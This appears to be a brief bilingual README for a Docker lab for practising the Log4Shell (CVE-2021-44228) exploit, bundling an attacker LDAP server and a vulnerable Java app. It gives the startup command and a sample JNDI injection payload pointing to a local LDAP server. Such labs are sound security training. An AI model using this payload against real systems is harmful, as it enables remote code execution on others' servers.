
Dockerized lab environment for safely practicing CVE-2021-44228 (Log4Shell) exploitation. Includes attacker LDAP server and vulnerable Java application for custom payload testing.
이 프로젝트는 CVE-2021-44228 (Log4Shell)로 알려진 심각한 Log4j 취약점을 안전하게 실습하고 이해할 수 있는 도커화된 환경을 제공합니다.
docker compose up --build
/vulnerable/Makefile의 test 섹션에서 페이로드를 수정할 수 있습니다.$${jndi:ldap://127.0.0.1:10000/}를 사용합니다.